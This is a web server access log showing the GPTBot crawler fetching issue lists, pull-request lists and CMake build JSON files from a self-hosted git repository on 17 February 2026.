"https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:19:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11628] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14835] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11628] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14834] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11599] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14806] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33313] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14835] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14833] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14831] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 